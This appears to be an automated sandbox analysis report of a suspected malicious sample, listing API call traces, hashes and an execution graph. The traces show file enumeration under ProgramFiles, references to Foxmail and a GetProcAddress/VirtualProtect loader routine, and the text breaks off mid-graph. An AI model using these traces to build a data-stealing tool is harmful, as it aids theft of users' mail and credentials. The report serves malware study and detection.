                                                                                                              • Instruction Fuzzy Hash: 42D0A7B340CE706EF30352109C04B8F6A58CF12710F090062E141A75D0C2780C814BBE
                                                                                                              Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,?), ref: 10001258
                                                                                                                • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                              • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                              • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloclstrcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 852173138-0
                                                                                                              • Opcode ID: 557374269f09ad200d9bf0d1f4ee52b1c16561ff9a32e2e2f2d6eea026f06a16
                                                                                                              • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                                                                                              • Opcode Fuzzy Hash: 557374269f09ad200d9bf0d1f4ee52b1c16561ff9a32e2e2f2d6eea026f06a16
                                                                                                              • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                                                                                              Function 004058D6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 004058E6
                                                                                                              • lstrcmpiA.KERNEL32(00405B05,00000000), ref: 004058FE
                                                                                                              • CharNextA.USER32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 0040590F
                                                                                                              • lstrlenA.KERNEL32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 00405918
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                              • String ID:
                                                                                                              • API String ID: 190613189-0
                                                                                                              • Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                                                              • Instruction ID: c707f4e568105da07dfe4c817e4f3fc028cff82ea2bd98979edb1fd84d8cb9b2
                                                                                                              • Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
                                                                                                              • Instruction Fuzzy Hash: 56F0C232604558FFC7129BA4DD0099EBBA8EF16360B2140AAE800F7211D274EE01ABA9

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:1.8%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:0.5%
                                                                                                              Total number of Nodes:214
                                                                                                              Total number of Limit Nodes:5
                                                                                                              execution_graph 8667 333e1c5b 8668 333e1c6b ___scrt_fastfail 8667->8668 8671 333e12ee 8668->8671 8670 333e1c87 8672 333e1324 ___scrt_fastfail 8671->8672 8673 333e13b7 GetEnvironmentVariableW 8672->8673 8697 333e10f1 8673->8697 8676 333e10f1 57 API calls 8677 333e1465 8676->8677 8678 333e10f1 57 API calls 8677->8678 8679 333e1479 8678->8679 8680 333e10f1 57 API calls 8679->8680 8681 333e148d 8680->8681 8682 333e10f1 57 API calls 8681->8682 8683 333e14a1 8682->8683 8684 333e10f1 57 API calls 8683->8684 8685 333e14b5 lstrlenW 8684->8685 8686 333e14d9 lstrlenW 8685->8686 8696 333e14d2 8685->8696 8687 333e10f1 57 API calls 8686->8687 8688 333e1501 lstrlenW lstrcatW 8687->8688 8689 333e10f1 57 API calls 8688->8689 8690 333e1539 lstrlenW lstrcatW 8689->8690 8691 333e10f1 57 API calls 8690->8691 8692 333e156b lstrlenW lstrcatW 8691->8692 8693 333e10f1 57 API calls 8692->8693 8694 333e159d lstrlenW lstrcatW 8693->8694 8695 333e10f1 57 API calls 8694->8695 8695->8696 8696->8670 8698 333e1118 ___scrt_fastfail 8697->8698 8699 333e1129 lstrlenW 8698->8699 8710 333e2c40 8699->8710 8702 333e1168 lstrlenW 8703 333e1177 lstrlenW FindFirstFileW 8702->8703 8704 333e11a0 8703->8704 8705 333e11e1 8703->8705 8706 333e11c7 FindNextFileW 8704->8706 8709 333e11aa 8704->8709 8705->8676 8706->8704 8707 333e11da FindClose 8706->8707 8707->8705 8709->8706 8712 333e1000 8709->8712 8711 333e1148 lstrcatW lstrlenW 8710->8711 8711->8702 8711->8703 8713 333e1022 ___scrt_fastfail 8712->8713 8714 333e10af 8713->8714 8715 333e102f lstrcatW lstrlenW 8713->8715 8716 333e10b5 lstrlenW 8714->8716 8727 333e10ad 8714->8727 8717 333e105a lstrlenW 8715->8717 8718 333e106b lstrlenW 8715->8718 8743 333e1e16 8716->8743 8717->8718 8729 333e1e89 lstrlenW 8718->8729 8721 333e10ca 8724 333e1e89 5 API calls 8721->8724 8721->8727 8722 333e1088 GetFileAttributesW 8723 333e109c 8722->8723 8722->8727 8723->8727 8735 333e173a 8723->8735 8725 333e10df 8724->8725 8748 333e11ea 8725->8748 8727->8709 8730 333e2c40 ___scrt_fastfail 8729->8730 8731 333e1ea7 lstrcatW lstrlenW 8730->8731 8732 333e1ec2 8731->8732 8733 333e1ed1 lstrcatW 8731->8733 8732->8733 8734 333e1ec7 lstrlenW 8732->8734 8733->8722 8734->8733 8736 333e1747 ___scrt_fastfail 8735->8736 8763 333e1cca 8736->8763 8739 333e199f 8739->8727 8741 333e1824 ___scrt_fastfail _strlen 8741->8739 8783 333e15da 8741->8783 8744 333e1e29 8743->8744 8747 333e1e4c 8743->8747 8745 333e1e2d lstrlenW 8744->8745 8744->8747 8746 333e1e3f lstrlenW 8745->8746 8745->8747 8746->8747 8747->8721 8749 333e120e ___scrt_fastfail 8748->8749 8750 333e1e89 5 API calls 8749->8750 8751 333e1220 GetFileAttributesW 8750->8751 8752 333e1246 8751->8752 8753 333e1235 8751->8753 8754 333e1e89 5 API calls 8752->8754 8753->8752 8756 333e173a 35 API calls 8753->8756 8755 333e1258 8754->8755 8757 333e10f1 56 API calls 8755->8757 8756->8752 8758 333e126d 8757->8758 8759 333e1e89 5 API calls 8758->8759 8760 333e127f ___scrt_fastfail 8759->8760 8761 333e10f1 56 API calls 8760->8761 8762 333e12e6 8761->8762 8762->8727 8764 333e1cf1 ___scrt_fastfail 8763->8764 8765 333e1d0f CopyFileW CreateFileW 8764->8765 8766 333e1d44 DeleteFileW 8765->8766 8767 333e1d55 GetFileSize 8765->8767 8772 333e1808 8766->8772 8768 333e1ede 22 API calls 8767->8768 8769 333e1d66 ReadFile 8768->8769 8770 333e1d7d CloseHandle DeleteFileW 8769->8770 8771 333e1d94 CloseHandle DeleteFileW 8769->8771 8770->8772 8771->8772 8772->8739 8773 333e1ede 8772->8773 8775 333e222f 8773->8775 8776 333e224e 8775->8776 8778 333e2250 8775->8778 8791 333e474f 8775->8791 8796 333e47e5 8775->8796 8776->8741 8782 333e2908 8778->8782 8803 333e35d2 8778->8803 8779 333e35d2 __CxxThrowException@8 RaiseException 8781 333e2925 8779->8781 8781->8741 8782->8779 8784 333e160c _strcat _strlen 8783->8784 8785 333e163c lstrlenW 8784->8785 8891 333e1c9d 8785->8891 8787 333e1655 lstrcatW lstrlenW 8788 333e1678 8787->8788 8789 333e167e lstrcatW 8788->8789 8790 333e1693 ___scrt_fastfail 8788->8790 8789->8790 8790->8741 8806 333e4793 8791->8806 8794 333e4765 8812 333e2ada 8794->8812 8795 333e478f 8795->8775 8801 333e56d0 _abort 8796->8801 8797 333e570e 8825 333e6368 8797->8825 8799 333e56f9 RtlAllocateHeap 8800 333e570c 8799->8800 8799->8801 8800->8775 8801->8797 8801->8799 8802 333e474f _abort 7 API calls 8801->8802 8802->8801 8805 333e35f2 RaiseException 8803->8805 8805->8782 8807 333e479f ___DestructExceptionObject 8806->8807 8819 333e5671 RtlEnterCriticalSection 8807->8819 8809 333e47aa 8820 333e47dc 8809->8820 8811 333e47d1 _abort 8811->8794 8813 333e2ae5 IsProcessorFeaturePresent 8812->8813 8814 333e2ae3 8812->8814 8816 333e2b58 8813->8816 8814->8795 8824 333e2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8816->8824 8818 333e2c3b 8818->8795 8819->8809 8823 333e56b9 RtlLeaveCriticalSection 8820->8823 8822 333e47e3 8822->8811 8823->8822 8824->8818 8828 333e5b7a GetLastError 8825->8828 8829 333e5b99 8828->8829 8830 333e5b93 8828->8830 8834 333e5bf0 SetLastError 8829->8834 8854 333e637b 8829->8854 8847 333e5e08 8830->8847 8836 333e5bf9 8834->8836 8835 333e5bb3 8861 333e571e 8835->8861 8836->8800 8840 333e5bb9 8842 333e5be7 SetLastError 8840->8842 8841 333e5bcf 8874 333e593c 8841->8874 8842->8836 8845 333e571e _free 17 API calls 8846 333e5be0 8845->8846 8846->8834 8846->8842 8879 333e5c45 8847->8879 8849 333e5e2f 8850 333e5e47 TlsGetValue 8849->8850 8853 333e5e3b 8849->8853 8850->8853 8851 333e2ada _ValidateLocalCookies 5 API calls 8852 333e5e58 8851->8852 8852->8829 8853->8851 8859 333e6388 _abort 8854->8859 8855 333e63c8 8857 333e6368 __dosmaperr 19 API calls 8855->8857 8856 333e63b3 RtlAllocateHeap 8858 333e5bab 8856->8858 8856->8859 8857->8858 8858->8835 8867 333e5e5e 8858->8867 8859->8855 8859->8856 8860 333e474f _abort 7 API calls 8859->8860 8860->8859 8862 333e5729 HeapFree 8861->8862 8863 333e5752 __dosmaperr 8861->8863 8862->8863 8864 333e573e 8862->8864 8863->8840 8865 333e6368 __dosmaperr 18 API calls 8864->8865 8866 333e5744 GetLastError 8865->8866 8866->8863 8868 333e5c45 _abort 5 API calls 8867->8868 8869 333e5e85 8868->8869 8870 333e5ea0 TlsSetValue 8869->8870 8871 333e5e94 8869->8871 8870->8871 8872 333e2ada _ValidateLocalCookies 5 API calls 8871->8872 8873 333e5bc8 8872->8873 8873->8835 8873->8841 8885 333e5914 8874->8885 8880 333e5c71 8879->8880 8881 333e5c75 __crt_fast_encode_pointer 8879->8881 8880->8881 8882 333e5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8880->8882 8883 333e5c95 8880->8883 8881->8849 8882->8880 8883->8881 8884 333e5ca1 GetProcAddress 8883->8884 8884->8881 8886 333e5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 8885->8886 8887 333e5938 8886->8887 8888 333e58c4 8887->8888 8889 333e5758 _abort 20 API calls 8888->8889 8890 333e58e8 8889->8890 8890->8845 8892 333e1ca6 _strlen 8891->8892 8892->8787 8893 333ec7a7 8894 333ec7be 8893->8894 8898 333ec82c 8893->8898 8894->8898 8905 333ec7e6 GetModuleHandleA 8894->8905 8896 333ec835 GetModuleHandleA 8899 333ec83f 8896->8899 8897 333ec872 8898->8896 8898->8897 8898->8899 8899->8898 8900 333ec85f GetProcAddress 8899->8900 8900->8898 8901 333ec7dd 8901->8898 8901->8899 8902 333ec800 GetProcAddress 8901->8902 8902->8898 8903 333ec80d VirtualProtect 8902->8903 8903->8898 8904 333ec81c VirtualProtect 8903->8904 8904->8898 8906 333ec7ef 8905->8906 8911 333ec82c 8905->8911 8917 333ec803 GetProcAddress 8906->8917 8908 333ec7f4 8908->8911 8912 333ec800 GetProcAddress 8908->8912 8909 333ec835 GetModuleHandleA 8914 333ec83f 8909->8914 8910 333ec872 8911->8909 8911->8910 8911->8914 8912->8911 8913 333ec80d VirtualProtect 8912->8913 8913->8911 8915 333ec81c VirtualProtect 8913->8915 8914->8911 8916 333ec85f GetProcAddress 8914->8916 8915->8911 8916->8911 8918 333ec82c 8917->8918 8919 333ec80d VirtualProtect 8917->8919 8921 333ec835 GetModuleHandleA 8918->8921 8922 333ec872 8918->8922 8919->8918 8920 333ec81c VirtualProtect 8919->8920 8920->8918 8924 333ec83f 8921->8924 8923 333ec85f GetProcAddress 8923->8924 8924->8918 8924->8923

                                                                                                              Executed Functions

                                                                                                              Function 333E10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 333E1137
                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 333E1151
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E115C
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E116D
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E117C
                                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 333E1193
                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010), ref: 333E11D0
                                                                                                              • FindClose.KERNEL32(00000000), ref: 333E11DB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 1083526818-0
                                                                                                              • Opcode ID: 3e71b007f64ed1a32eb5f26433e10d1415461b0df08ee1f1c5b95cd1a592b023
                                                                                                              • Instruction ID: f059f3f6f136a515efe62f32b9677f500ccda8117e357e986b05fe691f678ca8
                                                                                                              • Opcode Fuzzy Hash: 3e71b007f64ed1a32eb5f26433e10d1415461b0df08ee1f1c5b95cd1a592b023
                                                                                                              • Instruction Fuzzy Hash: 9021C1729443186BD720EE64DC48F9BBBDCEF84315F044D2AB958D3190EB74DA058796
                                                                                                              Function 333E12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 333E1434
                                                                                                                • Part of subcall function 333E10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 333E1137
                                                                                                                • Part of subcall function 333E10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 333E1151
                                                                                                                • Part of subcall function 333E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E115C
                                                                                                                • Part of subcall function 333E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E116D
                                                                                                                • Part of subcall function 333E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E117C
                                                                                                                • Part of subcall function 333E10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 333E1193
                                                                                                                • Part of subcall function 333E10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 333E11D0
                                                                                                                • Part of subcall function 333E10F1: FindClose.KERNEL32(00000000), ref: 333E11DB
                                                                                                              • lstrlenW.KERNEL32(?), ref: 333E14C5
                                                                                                              • lstrlenW.KERNEL32(?), ref: 333E14E0
                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 333E150F
                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 333E1521
                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 333E1547
                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 333E1553
                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 333E1579
                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 333E1585
                                                                                                              • lstrlenW.KERNEL32(?,?), ref: 333E15AB
                                                                                                              • lstrcatW.KERNEL32(00000000), ref: 333E15B7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                              • String ID: )$Foxmail$ProgramFiles
                                                                                                              • API String ID: 672098462-2938083778
                                                                                                              • Opcode ID: 8ec1e9a031d06fac8d6310d2703956ea554d70a5b874d9e5f4bc3ae218240f48
                                                                                                              • Instruction ID: faf56d8e1d15b59c22afed4a1778d6b3506a75ec8aa84d9ccc18a35da020bfac
                                                                                                              • Opcode Fuzzy Hash: 8ec1e9a031d06fac8d6310d2703956ea554d70a5b874d9e5f4bc3ae218240f48
                                                                                                              • Instruction Fuzzy Hash: D881AF72E40368A9DB20DBA1DC85FEEB37DEF84710F004596E508E7190EAB65E84CF95
                                                                                                              Function 333EC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(333EC7DD), ref: 333EC7E6
                                                                                                              • GetModuleHandleA.KERNEL32(?,333EC7DD), ref: 333EC838
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 333EC860
                                                                                                                • Part of subcall function 333EC803: GetProcAddress.KERNEL32(00000000,333EC7F4), ref: 333EC804
                                                                                                                • Part of subcall function 333EC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC816
                                                                                                                • Part of subcall function 333EC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC82A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099061454-0
                                                                                                              • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                              • Instruction ID: ddfe8c0a1e950d287b84920e2c651e37e229f41df9c51d6d99b32c671016e1e1
                                                                                                              • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                              • Instruction Fuzzy Hash: 76012257D8537038FA105E744E41AAE9F9C9B236A3B18C756E084C7693C9A08502C3A6
                                                                                                              Function 333EC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 79 333ec7a7-333ec7bc 80 333ec7be-333ec7c6 79->80 81 333ec82d 79->81 80->81 82 333ec7c8-333ec7f6 call 333ec7e6 80->82 83 333ec82f-333ec833 81->83 91 333ec86c-333ec86e 82->91 92 333ec7f8 82->92 85 333ec835-333ec83d GetModuleHandleA 83->85 86 333ec872 call 333ec877 83->86 87 333ec83f-333ec847 85->87 87->87 90 333ec849-333ec84c 87->90 90->83 93 333ec84e-333ec850 90->93 96 333ec866-333ec86b 91->96 97 333ec870 91->97 94 333ec7fa-333ec7fe 92->94 95 333ec85b-333ec85e 92->95 98 333ec856-333ec85a 93->98 99 333ec852-333ec854 93->99 102 333ec865 94->102 103 333ec800-333ec80b GetProcAddress 94->103 100 333ec85f-333ec860 GetProcAddress 95->100 96->91 97->90 98->95 99->100 100->102 102->96 103->81 104 333ec80d-333ec81a VirtualProtect 103->104 105 333ec82c 104->105 106 333ec81c-333ec82a VirtualProtect 104->106 105->81 106->105
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,333EC7DD), ref: 333EC838
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 333EC860
                                                                                                                • Part of subcall function 333EC7E6: GetModuleHandleA.KERNEL32(333EC7DD), ref: 333EC7E6
                                                                                                                • Part of subcall function 333EC7E6: GetProcAddress.KERNEL32(00000000,333EC7F4), ref: 333EC804
                                                                                                                • Part of subcall function 333EC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC816
                                                                                                                • Part of subcall function 333EC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC82A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099061454-0
                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                              • Instruction ID: 259040aa76ed53126dc4dcb40f0e25634f777ffbdbb06c4da88bb71e0648e56c
                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                              • Instruction Fuzzy Hash: F32138678883A16FFB118F748D407AE7FD89B132A2F1CC696D084CB143D5A88845C3A2
                                                                                                              Function 333EC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 107 333ec803-333ec80b GetProcAddress 108 333ec82d 107->108 109 333ec80d-333ec81a VirtualProtect 107->109 112 333ec82f-333ec833 108->112 110 333ec82c 109->110 111 333ec81c-333ec82a VirtualProtect 109->111 110->108 111->110 113 333ec835-333ec83d GetModuleHandleA 112->113 114 333ec872 call 333ec877 112->114 115 333ec83f-333ec847 113->115 115->115 117 333ec849-333ec84c 115->117 117->112 118 333ec84e-333ec850 117->118 119 333ec856-333ec85e 118->119 120 333ec852-333ec854 118->120 121 333ec85f-333ec865 GetProcAddress 119->121 120->121 124 333ec866-333ec86e 121->124 126 333ec870 124->126 126->117
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,333EC7F4), ref: 333EC804
                                                                                                              • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC816
                                                                                                              • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC82A
                                                                                                              • GetModuleHandleA.KERNEL32(?,333EC7DD), ref: 333EC838
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 333EC860
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 2152742572-0
                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                              • Instruction ID: 4035e1d69ae6314cc4c5b4beec38c6c8f8ea9d5639965bdd3164bea0a22c6a7e
                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                              • Instruction Fuzzy Hash: D9F0C2979C53703DFA114DB40E81AFE9FCC8A276A2B189A56E144C7283D8958906C3F6

                                                                                                              Non-executed Functions

                                                                                                              Function 00403219 Relevance: 65.1, APIs: 27, Strings: 10, Instructions: 324stringfilecomCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 136 403219-4032b0 #17 SetErrorMode OleInitialize call 40600b SHGetFileInfoA call 405ce0 GetCommandLineA call 405ce0 GetModuleHandleA 143 4032b2-4032b7 136->143 144 4032bc-4032d1 call 40579b CharNextA 136->144 143->144 147 403396-40339a 144->147 148 4033a0 147->148 149 4032d6-4032d9 147->149 152 4033b3-4033cd GetTempPathA call 4031e5 148->152 150 4032e1-4032e9 149->150 151 4032db-4032df 149->151 154 4032f1-4032f4 150->154 155 4032eb-4032ec 150->155 151->150 151->151 161 403425-40343f DeleteFileA call 402c7b 152->161 162 4033cf-4033ed GetWindowsDirectoryA lstrcatA call 4031e5 152->162 156 403386-403393 call 40579b 154->156 157 4032fa-4032fe 154->157 155->154 156->147 176 403395 156->176 159 403300-403306 157->159 160 403316-403343 157->160 164 403308-40330a 159->164 165 40330c 159->165 166 403345-40334b 160->166 167 403356-403384 160->167 179 4034d3-4034e2 call 403677 OleUninitialize 161->179 180 403445-40344b 161->180 162->161 178 4033ef-40341f GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031e5 162->178 164->160 164->165 165->160 171 403351 166->171 172 40334d-40334f 166->172 167->156 174 4033a2-4033ae call 405ce0 167->174 171->167 172->167 172->171 174->152 176->147 178->161 178->179 190 4034e8-4034f8 call 4054f4 ExitProcess 179->190 191 4035dc-4035e2 179->191 183 4034c3-4034cf call 403769 180->183 184 40344d-403458 call 40579b 180->184 183->179 193 40345a-403483 184->193 194 40348e-403498 184->194 196 4035e4-403601 call 40600b * 3 191->196 197 40365f-403667 191->197 198 403485-403487 193->198 201 40349a-4034a7 call 40585e 194->201 202 4034fe-403518 lstrcatA lstrcmpiA 194->202 223 403603-403605 196->223 224 